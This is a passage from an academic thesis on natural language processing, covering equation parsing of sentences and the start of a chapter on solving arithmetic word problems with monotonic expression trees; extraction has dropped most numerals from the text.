builds on a method we proposed for detecting and normalizing quantities in unrestricted english text; we developed a framework to remove variability and ambiguity from unstructured text by mapping it into a representation which makes reasoning more tractable. once quantities are mapped into our representation, we can support the reasoning required by quantity entailment. chapter equation parsing . introduction we now expand our focus from the local context of numbers, to consider entire sentences. we investigate how numbers interact with the entities, verbs and other components of the sentence. in particular, we investigate how we can extract numeric relations expressed in sentences, along with the arguments for those relations. extracting numeric relations from sentences is a key requirement for natural language understanding . as an example, consider the news article statement in example . . understanding it requires identifying relevant entities and the mathematical relations expressed among them in text, and determining how to compose them. similarly, solving a math word problem with a sentence like example . , requires realizing that it deals with a single number, knowing the meaning of “difference” and composing the right equation – “ ” needs to be subtracted from a number only after it is multiplied by . example . emanuel’s campaign contributions total three times those of his opponents put together. example . twice a number equals less than triple the same number. example . flying with the wind , a bird was able to make kilometers per hour. example . the sum of two numbers is . example . there are -dollar and -dollar notes. as a first step towards understanding such relations, we introduce the equation parsing task - given a sentence expressing a mathematical relation, the goal is to generate an equation representing the relation, and to map the variables in the equation to their corresponding noun phrases. to keep the problem tractable, we restrict the final output equation form to have at most two (possibly coreferent) variables, and assume that each quantity mentioned in the sentence can be used at most once in the final equation. in example . , the gold output of an equation parse should be v = ×v , with v = “emanuel’s campaign contributions” we empirically found that around % of sentences describing a relation have this property. and v = “those of his opponents put together”. the task can be seen as a form of semantic parsing [goldwasser and roth, , kwiatkowski et al., ] where instead of mapping a sentence to a logical form, we want to map it to an equation. however, there are some key differences that make this problem very challenging in ways that differ from the “standard” semantic parsing. in equation parsing, not all the components of the sentence are mapped to the final equation. there is a need to identify noun phrases that correspond to variables in the relations and determine that some are irrelevant and can be dropped. moreover, in difference from semantic parsing into logical forms, in equation parsing multiple phrases in the text could correspond to the same variable, and identical phrases in the text could correspond to multiple variables. we call the problem of mapping noun phrases to variables the problem of grounding variables. grounding is challenging for various reasons, key among them are that: (i) the text often does not mention “variables” explicitly, e.g., the sentence in example . describes a mathematical relation between the speed of bird and the speed of wind, without mentioning “speed” explicitly. (ii) sometimes, multiple noun phrases could refer to the same variable. for instance, in example . , both “a number” and “the same number” refer to the same variable. on the other hand, the same noun phrase might refer to multiple variables, as in example . , where the noun phrase “two numbers” refer to two variables. in addition, the task involves deciding which of the quantities identified in the sentence are relevant to the final equation generation. in example . , both “ ” and “ ” are not relevant for the final equation “v +v = ”. finally, the equation needs to be constructed from a list of relevant quantities and grounded variables. overall, the output space becomes exponential in the number of quantities mentioned in the sentence. determining the final equation that corresponds to the text is an inference step over a very large space. to address this, we define the concept of “projectivity” - a condition where the final equation can be generated by combining adjacent numbers or variables, and show that most sentences expressing mathematical relations exhibit the projectivity property. finally, we restrict our inference procedure to only search over equations which have this property. our approach builds on a pipeline of structured predictors that identify irrelevant quantities, recognize coreferent variables, and, finally, generate equations. we also leverage a high precision lexicon of math- ematical expressions and develop a greedy lexicon matching strategy to guide inference. we discuss and exemplify the advantages of this approach and, in particular, explain where the “standard” nlp pipeline fails to support equation parsing, and necessitates the new approach proposed here. another contribution of this work is the development of a new annotated data set for the task of equation parsing. we evaluate our method on this dataset and show that our method predicts the correct equation in % of the cases and that in % of the time we also ground all variables correctly. the next section presents a discussion of related work. next we formally describe the task of equation parsing. the following sections describe our equation representation and the concept of projectivity, followed by the description of our algorithm to generate the equations and variable groundings from text. we conclude with experimental results. . related work the work most related to this work is [madaan et al., ], which focuses on extracting relation triples where one of the arguments is a number. in contrast, our work deals with multiple variables and com- plex equations involving them. this work is also conceptually related to work on semantic parsing – map- ping natural language text to a formal meaning representation [wong and mooney, , clarke et al., , cai and yates, , kwiatkowski et al., , goldwasser and roth, ]. however, as mentioned earlier, there are some significant differences in the task definition that necessitate the development of a new ap- proach. . the equation parsing task equation parsing takes as input a sentence x describing a single mathematical equation, comprising one or two variables and other quantities mentioned in x. let n be the set of noun phrases in the sentence x. the output of the task is the mathematical equation described in x, along with a mapping of each variable in the equation to its corresponding noun phrase in n. we refer to this mapping as the “grounding” of the variable; the noun phrase represents what the variable stands for in the equation. table . gives an example of an input and output for the equation parsing of the text in example . . since an equation can be written in various forms, we use the form which most agrees with text, as our target output. so, for example . , we will choose v = ×v and not v = v ÷ . in cases where several equation forms seem to be equally likely to be the target equation, we randomly choose one of them, and keep this choice consistent across the dataset. the equation parsing task input twice a number equals less than triple the same number. output ×v = ( ×v ) − (equation) v = “a number” (grounding) table . : input and output for equation parsing . . equation parse representation twice a number equals less than triple the same number.sentence trigger list equation tree v v × = −r × figure . : a sentence with its trigger list and equation tree. −r indicates subtraction with order rl. in this section, we introduce an equation parse for a sentence. an equation parse of a sentence x is a pair (t,e), where t represents a set of triggers extracted from x, and e represents an equation tree formed with the set t as leaves. we now describe these terms in detail. trigger given a sentence x mentioning a mathematical relation, a trigger can either be a quantity trig- ger expressed in x, or variable trigger which is a noun phrase in x corresponding to a variable. a quantity trigger is a tuple (q,s), where q is the numeric value of the quantity mentioned in text, and s is the span of text from the sentence x which refers to the quantity. a variable trigger is a tuple (l,s), where l represents the label of the variable, and s represents the noun phrase representing the variable. for example, for the sentence in fig . , the spans “twice”, “ ”, and “triple” generate quantity triggers, whereas “a number” and “the same number” generate variable triggers, with label v . trigger list the trigger list t for a sentence x contains one trigger for each variable mention and each nu- meric value used in the final equation expressed by the sentence x. the trigger list might consist of multiple triggers having the same label, or extracted from the same span of text. in the example sentence in fig . , the trigger list comprises two triggers having the same label v . the final trigger list for the example in fig . is {( , “ ”), (v , “a number”), ( , “ ”), ( , “triple”), (v , “the same number”)}. note that there can be multiple valid trigger lists. in our example, we could have chosen both variable triggers to point to the same mention “a number”. quantity triggers in the trigger list form the quantity trigger list, and the variable triggers in trigger list form the variable trigger list. notation definition quantity trigger mention of a quantity in text variable trigger noun phrase coupled with variable label trigger quantity or variable trigger quantity trigger list list of quantity triggers, one for each number mention in equation variable trigger list list of variable triggers, one for each variable mention in equation trigger list union of quantity and variable trigger list equation tree binary tree representation of equation lc(n), rc(n) left and right child of node n expr(n) expression represented by node n �(n) operation at node n order(n) order of operation at node n location(n) character offset of trigger representing leaf node n span-start(n), span-end(n) start and end character offsets of span covered by node n table . : summary of notations used in this chapter equation tree an equation tree of a sentence x is a binary tree whose leaves constitute the trigger list of x, and internal nodes (except the root) are labeled with one of the following operations – addition, subtraction, multiplication, division. in addition, for nodes which are labeled with subtraction or division, we maintain a separate variable to determine order of its children. the root of the tree is always labeled with the operation equal. an equation tree is a natural representation for an equation. each node n in an equation tree represents an expression expr(n), and the label of the parent node determines how the expressions of its children are to be composed to construct its own expression. let us denote the label for a non-leaf node n to be �(n), where �(n) ∈ {+,−,×,÷, =} and the order of a node n’s children by order(n) (defined only for subtraction and division nodes), which takes values lr (left-right) or rl (right-left). for a leaf node n, the expression expr(n) represents the variable label, if n is a variable trigger, and the numeric value of the quantity, if it is a quantity trigger. finally, we use lc(n) and rc(n) to represent the left and right child of node n, respectively. the equation represented by the tree can be generated as follows. for all non-leaf nodes n, we have expr(n) =   expr(lc(n))�(n) expr(rc(n)) if �(n) ∈{+,×, =} expr(lc(n))�(n) expr(rc(n)) if �(n) ∈{−,÷}∧order(n) = lr expr(rc(n))�(n) expr(lc(n)) if �(n) ∈{−,÷}∧order(n) = rl ( . ) given an equation tree t of a sentence, the equation represented by it is the expression generated by the root of t (following equation . ). referring to the equation tree in fig . , the node marked “−r” represents ( ×v ) − , and the root represents the full equation ×v = ( ×v ) − . . projectivity for each leaf n of an equation tree t , we define a function location(·), to indicate the position of the corresponding trigger in text. we also define for each node n of equation tree t , functions span-start(n) and span-end(n) to denote the minimum span of text containing the leaves of the subtree rooted at n. we define them as follows: span-start(n) =   location(n) if n is a leaf min(span-start(lc(n)),span-start(rc(n))) otherwise span-end(n) =   location(n) if n is a leaf max(span-end(lc(n)),span-end(rc(n))) otherwise an equation tree t is called projective iff for every node n of t , either span-end(lc(n)) ≤ span-start(rc(n)) or span-end(rc(n)) ≤ span-start(lc(n)). in other words, the span of the left child and the right child cannot intersect in a projective equation tree . the key observation, as our corpus analysis indicates, is that for most sentences, there exists a trigger list, such that the equation tree representing the relation in the sentence is projective. however this might this is more general than the definition of projective trees used in dependency parsing [mcdonald et al., ]. involve mapping two mentions of the same variable to different noun phrases. figure . shows an example of a projective equation tree, which requires different mentions of v to be mapped to different noun phrases. if we had mapped both mentions of v to same noun phrase “a number”, the resulting equation tree would not have been projective. we collected sentences which represent an equation with one or two mentions of variables, and each number in the sentence used at most once in the equation. we found that only one sentence among these could not generate a projective equation tree. (see section . . for details on dataset creation). therefore, we develop an algorithmic approach for predicting projective equation trees, and show empirically that it compares favorably with ones which do not make the projective assumption. . predicting equation parse equation parsing of a sentence involves predicting three components – quantity trigger list, variable trigger list and equation tree. we develop three structured prediction modules to predict each of the above components. all our prediction modules take a similar form: given input x and output y, we learn a scoring function fw(x,y), which scores how likely is the output y given input x. the scoring function fw(x,y) is linear, fw(y) = w t φ(x,y), where φ(x,y) is a feature vector extracted from x and y. the inference problem, that is, the prediction y∗ for an input x is then: y∗ = arg maxy∈y fw(y), where y is the set of all allowed values of y. . . predicting quantity trigger list given input text and the quantities mentioned in it, the role of this step is to identify , for each quantity in the text, whether it should be part of the final equation. for instance, in example . in section . , both “ ” and “ ” are not relevant for the final equation “v + v = ”. similarly, in example . , the number “two” is irrelevant for the equation “v + v = ”. we define for each quantity q in the sentence, a boolean value relevance(q), which is set to true if q is relevant for the final equation, and to false otherwise. for the structured classification, the input x is the sentence along with a set of recognized quantities mentioned in it, and the output y is the relevance values for all quantities in the sentence. we empirically found that predicting all relevance values jointly performs better than having a binary classifier predict each one separately. the feature function φ(x,y) used for the classification generates the following features : . neighborhood features : for each quantity q in the input sentence, we add unigrams and bigrams generated from a window around q, part of speech tags of neighborhood tokens of q. we conjoin these features with relevance(q). . quantity features : for each quantity q, we add unigrams and bigrams of the phrase representing the quantity. also, we add a feature indicating whether the number is associated with number one or two, and whether it is the only number present in the sentence. these features are also conjoined with relevance(q). . . predicting variable trigger list the goal of this step is to predict the variable trigger list for the equation. our structured classifier takes as input the sentence x, and the output y is either one or two noun-phrases, representing variables in the final equation. as we pointed out earlier, multiple groundings might be valid for any given variable, hence there can be multiple valid variable trigger lists. for every sentence x, we construct a set y of valid outputs. each element in y corresponds to a valid variable trigger list. finally, we aim to output only one of the elements of y . we modified the standard structured prediction algorithm to consider “superset supervision” and take into account multiple gold structures for an input x. we assume access to n training examples of the form : (x ,y ), (x ,y ), . . . , (xn,yn ), where each yi is a set of valid outputs for the sentence xi. since we want to output only one variable trigger list, we want to score at least one y from yi higher than all other possible outputs, for each xi. we use a modified latent structured svm to learn the weight vector w. the algorithm treats the best choice among all of yi as a latent variable. at each iteration, for all xi, the algorithm chooses the best choice y∗i from the set yi, according to the weight vector w. then, w is updated by learning on all (xi,y ∗ i ) by a standard structured svm algorithm. the details of the algorithm are in algorithm . algorithm structural svm with superset supervision input: training data t = {(x ,y ), (x ,y ), . . . , (xn,yn )} output: trained weight vector w : w ← w : repeat : t ′ ←∅ : for all (xi,yi) ∈ t do : y∗i ← arg maxy∈yi wt φ(xi,y) : t ′ ← t ′ ∪{(xi,y∗i )} : end for : update w by running standard structural svm algorithm on t ′ : until convergence : return w the distinction from standard latent structural svm is in line of algorithm . in order to get the best choice y∗i for input xi, we search only inside yi, instead of all of y. a similar formulation can be found in [björkelund and kuhn, ]. the features φ(x,y) used for variable trigger prediction are as follows: . variable features : unigrams and bigrams generated from the noun phrase representing variables, part of speech tags of tokens in noun phrase representing variables. . neighborhood features : unigrams and pos tags from neighborhood of variables. all the above features are conjoined with two labels, one denoting whether y has two variables or one, and the second denoting whether y has two variables represented by the same noun phrase. if the output of the classifier is a pair of noun phrases, we use a rule based variable coreference detector, to determine whether both noun phrases should have the same variable label or not. the rules for variable coreference are as follows : . if both noun phrases are the same, and they do not have the token “two” or “ ”, they have the same label. . if the noun phrases are different, and the noun phrase appearing later in the sentence contains tokens “itself”, “the same number”, they have the same label. . in all other cases, they have different labels. finally, each noun phrase contributes one variable trigger to the variable trigger list. . . predicting equation tree it is natural to assume that the syntactic parse of the sentence could be very useful in addressing all the predictions we are making in the equation parsing tasks. however, it turns out that this is not the case – large portions of the syntactic parse will not be part of the equation parse, hence we need the aforementioned modules to address this. nevertheless, in the next task of predicting the equation tree, we attempted to constraint the output space using guidance from the syntactic tree; we found, though, that even enforcing this weak level of output expectation is not productive. this was due to the poor performance of current syntactic parsers on the equation data (eg., in % of sentences, the stanford parser made a mistake which does not allow recovering the correct equation). the tree prediction module receives the trigger list predicted by the previous two modules, and the goal is to create an equation tree using the trigger list as the leaves of that tree. the input x is the sentence and the trigger list, and the output y is the equation tree representing the relation described in the sentence. we assume that the output will be a projective equation tree. for features φ(x,y), we extract for each non-leaf node n of the equation tree y, the following: . neighborhood features : unigrams, bigrams and pos tags from neighborhood of span-start(lc(n)), span-start(rc(n)), span-end(lc(n)) and span-end(rc(n)), conjoined with �(n) and order(n). . connecting text features : unigrams, bigrams and part of speech tags between min(span-end(lc(n)),span-end(rc(n))) and max(span-start(lc(n)), span-start(rc(n))), conjoined with �(n) and order(n). . number features : in case we are combining two leaf nodes representing quantity triggers, we add a feature signifying whether one number is larger than the other. the projectivity assumption implies that the final equation tree can be generated by combining only adjacent nodes, once the set of leaves is sorted based on span-start(·) values. this allows us to use cky algorithm for inference. a natural approach to further reduce the output space is to conform to the projective structure of the syntactic parse of the sentence. however, we found this to adversely affect performance, due to the poor performance of syntactic parser on equation data. lexicon to bootstrap the equation parsing process, we developed a high precision lexicon to translate mathematical expressions to operations and orders, like “sum of a and b” translates to “a+b”, “a minus b” translates to “a-b”, etc. (where a and b denote placeholder numbers or expressions). at each step of cky, while constructing a node n of the equation tree, we check for a lexicon text expression corresponding to node n. if found, we allow only the corresponding operation (and order) for node n, and do not explore other operations or orders. we show empirically that reducing the space using this greedy lexicon matching help improve performance. we found that using the lexicon rules as features instead of hard constraints do not help as much. note that our lexicon comprises only generic math concepts, and around % of the sentences in our dataset do not contain any pattern from the lexicon. details of the lexicon are added to the appendix. finally, given input sentence, we first predict the quantity trigger and the variable trigger lists. given the complete trigger list, we predict the equation tree relating the components of the trigger list. . . alternatives a natural approach could be to jointly learn to predict all three components, to capture the dependencies among them. to investigate this, we developed a structured svm which predicts all components jointly, using the union of the features of each component. we use approximate inference, first enumerating possible trigger lists, and then equation trees, and find the best scoring structure. however, this method did not outperform the pipeline method. the worse performance of joint learning is due to: ( ) search space being too large for the joint model to do well given our dataset size of , and ( ) our independent classifiers being good enough, thus supporting better joint inference. this tradeoff is strongly supported in the literature [punyakanok et al., b, sutton and mccallum, ]. another option is to enforce constraints between trigger list predictions, such as, variable triggers should not overlap with the quantity triggers. however, we noticed that often noun phrases returned by the stanford parser were noisy, and would include neighboring numbers within the extracted noun phrases. this prevented us from enforcing such constraints. . experimental results we now describe the data set, and the annotation procedure used. we then evaluate the system’s performance on predicting trigger list, equation tree, and the complete equation parse. . . dataset we created a new dataset consisting of sentences extracted from algebra word problems and financial news headlines. for algebra word problems, we used the mit dataset [kushman et al., ], and two high school mathematics textbooks, elementary algebra (college of redwoods) and beginning and intermediate algebra (tyler wallace). financial news headlines were extracted from the latest news feed of marketwatch, over the month of february, . all sentences with information describing a mathematical relation among at most two (possibly coreferent) variables, were chosen. next, we pruned sentences which require multiple uses of a number to create the equation. this only removed a few time related sentences like “in years, john will be twice as old as his son.”. we empirically found that around % of sentences describing a relation fall under the scope of our dataset. some statistics of the dataset are provided in table . . source #sentences mit redwoods wallace marketwatch table . : statistics of dataset the annotators were shown each sentence paired with the normalized equation representing the relation in the sentence. for each variable in the equation, the annotators were asked to mark spans of text which best describe what the variable represents. they were asked to annotate associated entities if exact variable description was not present. for instance, in example . (section ), the relation holds between the speed of bird and the speed of wind. however, “speed” is not explicitly mentioned in the sentence. in such cases, the annotators were asked to annotate the associated entities “the wind” and “a bird” as representing variables. the guidelines also directed annotators to choose the longest possible mention, in case they feel the mention boundary is ambiguous. as a result, in the sentence, “city rentals rent an intermediate-size car for . dollars plus . per mile.”, the phrase “city rentals rent an intermediate-size car” was annotated as representing variable. we allow multiple mentions to be annotated for the same variable. in example . (section ), both “a number” and “the same number” were annotated as representing the same variable. we wanted to consider only noun phrase constituents for variable grounding. therefore, for each anno- tated span, we extracted the noun phrase with maximum overlap with the span, and used it to represent the variables. finally, a tuple with each variable being mapped to one of the noun phrases representing it, forms a valid output grounding (variable trigger list). we computed inter-annotator agreement on the final annotations where only noun phrases represent variables. the agreement (kappa) was . , indicating good agreement. the average number of mention annotations per sentence was . . . . equation parsing modules in this section, we evaluate the performance of the individual modules of the equation parsing process. we report accuracy - the fraction of correct predictions. tables . , . and . show the -fold cross validation accuracy of the various modules. in each case, we also report accuracy by removing each feature group, one at a time. in addition, for equation tree prediction, we also show the effect of lexicon, projectivity, conforming to syntactic parse constraints, and using lexicon as features instead of hard constraints. for all our experiments, we use the stanford parser [chen and manning, ], the illinois pos tagger [roth and zelenko, ], the illinois shallow parser [punyakanok and roth, ] and the illinois-sl structured prediction package [chang et al., ]. accuracy all features . no neighborhood features . no quantity features . table . : performance of quantity trigger list prediction accuracy all features . no variable features . no neighborhood features . table . : performance of variable trigger list prediction accuracy all features . no neighborhood features . no connecting text features . no number features . no lexicon . no projectivity . conform with syntactic parse . lexicon as features . table . : performance of equation tree prediction . . equation parsing results in this section, we evaluate the performance of our system on the overall equation parsing task. we report equation accuracy - the fraction of sentences for which the system got the equation correct, and equa- tion+grounding accuracy - the fraction of sentences for which the system got both the equation and the grounding of variables correct. table . shows the overall performance of our system, on a -fold cross validation. we compare against joint learning - a system which jointly learns to predict all relevant com- ponents of an equation parse (section . . ). we also compare with spf [artzi and zettlemoyer, ], a publicly available semantic parser, which can learn from sentence-logical form pairs. we train spf with sentence-equation pairs and a seed lexicon for mathematical terms (similar to ours), and report equation accuracy. our structured predictors pipeline approach is shown to be superior to both joint learning and spf. source equation accuracy equation + grounding accuracy our system . ± . . ± . joint learning . ± . . ± . spf . n/a table . : performance on equation parsing spf gets only a few sentences correct. we attribute this to the inability of spf to handle overlapping mentions (like in example . ), as well as its approach of parsing the whole sentence to the final output form. the developers of spf also confirmed that it is not suitable for equation parsing and that these results are expected. since equation parsing is a more involved process, a slight adaptation of spf does not seem possible, necessitating a more involved process , of the type we propose. our approach, in contrast to spf, can handle overlapping mentions, selects triggers from text, and parses the trigger list to form equations. . . error analysis for variable trigger list prediction, around % of the errors were due to the predictor choosing a span which is contained within the correct span, e.g., when the target noun phrase is “the cost of a child’s ticket”, our predictor chose only “child’s ticket”. although this choice might be sufficient for downstream tasks, we consider it to be incorrect in our current evaluation. another % of the errors were due to selection of entities which do not participate in the relation. for example, in “a rancher raises times as many cows as horses.”, our predictor chose “a rancher” and “cows” as variables, whereas the relation exists between “cows” and “horses”. for the prediction of the equation tree, we found that % of the errors were due to rare math concepts expressed in text. for example, “ dollars short of the price” represents dollars should be subtracted from the price. these errors can be handled by carefully augmenting the lexicon. another % of the errors were due to lack of world knowledge, requiring understanding of time, speed, and distance. . conclusion in this chapter, we investigate methods that identify and understand mathematical relations expressed in text. we introduce the equation parsing task, which involves generating an equation from a sentence and identifying what the variables represent. we define the notion of projectivity, and construct a high precision lexicon, and use these to reduce the equation search space. our experimental results are quite satisfying and raise a few interesting issues. in particular, it suggests that predicting equation parses using a pipeline of structured predictors performs better than jointly trained alternatives. as discussed, it also points out the limitation of the current nlp tools in supporting these tasks. code and dataset are available at http://cogcomp.cs.illinois.edu/page/publication_view/ . private communication http://cogcomp.cs.illinois.edu/page/publication_view/ chapter arithmetic word problems . introduction in this chapter, we expand our focus on quantitative reasoning over multiple numbers mentioned across different sentences. as a test bed, we choose the task of automatically solving arithmetic word problems. we found these problems to be a good abstraction of the challenges faced in quantitative reasoning across multiple sentences. word problems arise naturally when reading the financial section of a newspaper, or following election coverage. these problems pose an interesting challenge to the nlp community, due to its concise and relatively straightforward text, and seemingly simple semantics. arithmetic word problems are usually directed towards elementary school students, and can be solved by combining the numbers mentioned in text with basic operations (addition, subtraction, multiplication, division). they are simpler than algebra word problems which require students to identify variables, and form equations with these variables to solve the problem. initial methods to address arithmetic word problems have mostly focused on subsets of problems, re- stricting the number or the type of operations used [roy et al., , hosseini et al., ] but could not deal with multi-step arithmetic problems involving all four basic operations. the template based method of [kushman et al., ], on the other hand, can deal with all types of problems, but implicitly assumes that the solution is generated from a set of predefined equation templates. in this chapter, we present a novel approach which can solve a general class of arithmetic problems without predefined equation templates. in particular, it can handle multiple step arithmetic problems as shown in example . . example . gwen was organizing her book case making sure each of the shelves had exactly books on it. she has types of books - mystery books and picture books. if she had shelves of mystery books and shelves of picture books, how many books did she have in total? the solution involves understanding that the number of shelves needs to be summed up, and that the total number of shelves needs to be multiplied by the number of books each shelf can hold. in addition, one has to understand that the number “ ” is not a direct part of the solution of the problem. while a solution to these problems eventually requires composing multi-step numeric expressions from text, we believe that directly predicting this complex expression from text is not feasible. at the heart of our technical approach is the novel notion of an expression tree. we show that the arithmetic expressions we are interested in can always be represented using an expression tree that has some unique decomposition properties. this allows us to decompose the problem of mapping the text to the arithmetic expression to a collection of simple prediction problems, each determining the lowest common ancestor operation between a pair of quantities mentioned in the problem. we then formulate the decision problem of composing the final expression tree as a joint inference problem, via an objective function that consists of all these decomposed prediction problems, along with legitimacy and background knowledge constraints. learning to generate the simpler decomposed expressions allows us to support effectively support quan- titative reasoning over multiple numbers, and allows generalization across problems types. in particular, our system could solve example . even though it has never seen a problem that requires both addition and multiplication operations. we also introduce a second concept, that of quantity schema, that allows us to focus on the information relevant to each quantity mentioned in the text. we show that features extracted from quantity schemas help reasoning effectively about the solution. moreover, quantity schemas help identify unnecessary text snippets in the problem text. for instance, in example . , the information that “tom washed cars over the weekend” is irrelevant; he could have performed any activity to earn money. in order to solve the problem, we only need to know that he had $ last week, and now he has $ . example . last week tom had $ . he washed cars over the weekend and now has $ . how much money did he make from the job? we combine the classifiers’ decisions using a constrained inference framework that allows for incorporating world knowledge as constraints. for example, we deliberatively incorporate the information that, if the problems asks about an “amount”, the answer must be positive, and if the question starts with “how many”, the answer will most likely be an integer. our system is evaluated on two existing datasets of arithmetic word problems, achieving state of the art performance on both. we also create a new dataset of multistep arithmetic problems, and show that our system achieves competitive performance in this challenging evaluation setting. the next section describes the related work in the area of automated math word problem solving. we then present the theory of expression trees and our decomposition strategy that is based on it. sec. presents the overall computational approach, including the way we use quantity schemas to learn the mapping from text to expression tree components. finally, we discuss our experimental study and conclude. . related work work in automated arithmetic problem solvers has focused on a restricted subset of problems. the system described in [hosseini et al., , mitra and baral, ] handles only addition and subtraction problems, and requires additional annotated data for verb categories. in contrast, our system does not require any addi- tional annotations and can handle a more general category of problems. the approach in [roy et al., ] supports all four basic operations, and uses a pipeline of classifiers to predict different properties of the problem. however, it makes assumptions on the number of quantities mentioned in the problem text, as well as the number of arithmetic steps required to solve the problem. in contrast, our system does not have any such restrictions, effectively handling problems mentioning multiple quantities and requiring multiple steps. kushman’s approach to automatically solving algebra word problems [kushman et al., ] might be the most related to ours. it tries to map numbers from the problem text to predefined equation templates. however, they implicitly assume that similar equation forms have been seen in the training data. in contrast, our system can perform competitively, even when it has never seen similar expressions in training. there is a recent interest in understanding text for the purpose of solving scientific and quantitative problems of various kinds. our approach is related to work in understanding and solving elementary school standardized tests [clark, ]. the system described in [berant et al., ] attempts to automatically answer biology questions, by extracting the structure of biological processes from text. there has also been efforts to solve geometry questions by jointly understanding diagrams and associated text [seo et al., ]. our constrained inference module falls under the general framework of constrained conditional models (ccm) [chang et al., ]. in particular, we use the l+i scheme of ccms, which predicts structured out- put by independently learning several simple components, combining them at inference time. this has been successfully used to incorporate world knowledge at inference time, as well as getting around the need for large amounts of jointly annotated data for structured prediction [roth and yih, , punyakanok et al., a, punyakanok et al., , clarke and lapata, , barzilay and lapata, , roy et al., ]. . expression tree and problem decomposition we address the problem of automatically solving arithmetic word problems. the input to our system is the problem text p , which mentions n quantities q ,q , . . . ,qn. our goal is to map this problem to a read- once arithmetic expression e that, when evaluated, provides the problem’s solution. we define a read-once arithmetic expression as one that makes use of each quantity at most once. we say that e is a valid expression, if it is such a read-once arithmetic expression, and we only consider in this work problems that can be solved using valid expressions (it’s possible that they can be solved also with invalid expressions). an expression tree t for a valid expression e is a binary tree whose leaves represent quantities, and each internal node represents one of the four basic operations. for a non-leaf node n, we represent the operation associated with it as �(n), and its left and right child as lc(n) and rc(n) respectively. the numeric value of the quantity associated with a leaf node n is denoted as q(n). each node n also has a value associated with it, represented as val(n), which can be computed in a recursive way as follows: val(n) =   q(n) if n is a leaf val(lc(n))�(n) val(rc(n)) otherwise ( . ) for any expression tree t for expression e with root node nroot, the value of val(nroot) is exactly equal to the numeric value of the expression e. therefore, this gives a natural representation of numeric expressions, providing a natural parenthesization of the numeric expression. fig . shows an example of an arithmetic problem with solution expression and an expression tree for the solution expression. problem gwen was organizing her book case making sure each of the shelves had exactly books on it. she has types of books - mystery books and picture books. if she had shelves of mystery books and shelves of picture books, how many books did she have total? solution ( + ) × = expression tree of solution + × figure . : an arithmetic word problem, solution expression and the corresponding expression tree definition an expression tree t for a valid expression e is called monotonic if it satisfies the following conditions: . if an addition node is connected to a subtraction node, then the subtraction node is the parent. . if a multiplication node is connected to a division node, then the division node is the parent. . two subtraction nodes cannot be connected to each other. . two division nodes cannot be connected to each other. fig . shows two different expression trees for the same expression. fig . b is monotonic whereas fig . a is not. our decomposition relies on the idea of monotonic expression trees. we try to predict for each pair of quantities qi,qj, the operation at the lowest common ancestor (lca) node of the monotonic expression tree for the solution expression. we also predict for each quantity, whether it is relevant to the solution. finally, an inference module combines all these predictions. + − × + (a) + − × + (b) figure . : two different expression trees for the numeric expression ( × ) + − − . the right one is monotonic, whereas the left one is not. in the rest of the section, we show that for any pair of quantities qi,qj in the solution expression, any monotonic tree for the solution expression has the same lca operation. therefore, predicting the lca operation becomes a multiclass classification problem. the reason that we consider the monotonic representation of the expression tree is that different trees could otherwise give different lca operation for a given pair of quantities. for example, in fig . , the lca operation for quantities and can be + or −, depending on which tree is considered. definition we define an addition-subtraction chain of an expression tree to be the maximal connected set of nodes labeled with addition or subtraction. the nodes of an addition-subtraction (as) chain c represent a set of terms being added or subtracted. these terms are sub-expressions created by subtrees rooted at neighboring nodes of the chain. we call these terms the chain terms of c, and the whole expression, after node operations have been applied to the chain terms, the chain expression of c. for example, in fig . , the shaded nodes form an addition-subtraction chain. the chain expression is ( × ) + − − , and the chain terms are × , , and . we define a multiplication-division (md) chain in a similar way. theorem . . . every valid expression can be represented by a monotonic expression tree. proof. the proof is procedural, that is, we provide a method to convert any expression tree to a monotonic expression tree for the same expression. consider a non-monotonic expression tree e, and without loss of generality, assume that the first condition for monotonicity is not valid. therefore, there exists an addition node ni and a subtraction node nj, and ni is the parent of nj. consider an addition-subtraction chain c which includes ni,nj. we now replace the nodes of c and its subtrees in the following way. we add a single subtraction node n−. the left subtree of n− has all the addition chain terms connected by addition nodes, and the right subtree of n− has all the subtraction chain terms connected by addition nodes. both subtrees of n− only require addition nodes, hence monotonicity condition is satisfied. we can construct the monotonic tree in fig . b from the non-monotonic tree of fig . a using this procedure. the addition chain terms are × and , and the subtraction chain terms are and . as as was described above, we introduce the root subtraction node in fig . b and attach the addition chain terms to the left and the subtraction chain terms to the right. the same line of reasoning can be used to handle the second condition with multiplication and division replacing addition and subtraction, respectively. theorem . . . consider two valid expression trees t and t for the same expression e. let c , c be the chain containing the root nodes of t and t respectively. the chain type (addition-subtraction or multiplication-division) as well as the the set of chain terms of c and c are identical. proof. we first prove that the chains containing the roots are both as or both md, and then show that the chain terms are also identical. we prove by contradiction that the chain type is same. let c ’s type be “addition-subtraction” and c ’s type be “multiplication-division” (without loss of generality). since both c and c generate the same expression e, we have that e can be represented as sum (or difference) of two expressions as well as product(or division) of two expressions. transforming a sum (or difference) of expressions to a product (or division) requires taking common terms from the expressions, which imply that the sum (or difference) had duplicate quantities. the opposite transformation adds same term to various expressions leading to multiple uses of the same quantity. therefore, this will force at least one of c and c to use the same quantity more than once, violating validity. we now need to show that individual chain terms are also identical. without loss of generality, let us assume that both c and c are “addition-subtraction” chains. suppose the chain terms of c and c are not identical. the chain expression for both the chains will be the same (since they are root chains, the chain expressions has to be the same as e). let the chain expression for c be ∑ i ti − ∑ i t ′ i, where ti’s are the addition chain terms and t′i are the subtraction chain terms. similarly, let the chain expression for c be ∑ i si − ∑ i s ′ i. we know that ∑ i ti − ∑ i t ′ i = ∑ i si − ∑ i s ′ i, but the set of ti’s and t ′ i’s is not the same as the set of si and s ′ i’s. however it should be possible to transform one form to the other using mathematical manipulations. this transformation will involve taking common terms, or multiplying two terms, or both. following previous explanation, this will force one of the expressions to have duplicate quantities, violating validity. hence, the chain terms of c and c are identical. consider an expression tree t for a valid expression e. for a distinct pair of quantities qi,qj participating in expression e, we denote by ni,nj the leaves of the expression tree t representing qi,qj, respectively. let nlca(qi,qj;t ) to be the lowest common ancestor node of ni and nj. we also define order(qi,qj;t ) to be true if ni appears in the left subtree of nlca(qi,qj;t ) and nj appears in the right subtree of nlca(qi,qj;t ) and set order(qi,qj;t ) to false otherwise. finally we define �lca(qi,qj;t ) for a pair of quantities qi,qj as follows : �lca(qi,qj,t ) =   + if �(nlca(qi,qj;t )) = + × if �(nlca(qi,qj;t )) = × − if �(nlca(qi,qj;t )) = − and order(qi,qj;t ) = true −reverse if �(nlca(qi,qj;t )) = − and order(qi,qj;t ) = false ÷ if �(nlca(qi,qj;t )) = ÷ and order(qi,qj;t ) = true ÷reverse if �(nlca(qi,qj;t )) = ÷ and order(qi,qj;t ) = false ( . ) definition given two expression trees t and t for the same expression e, t is 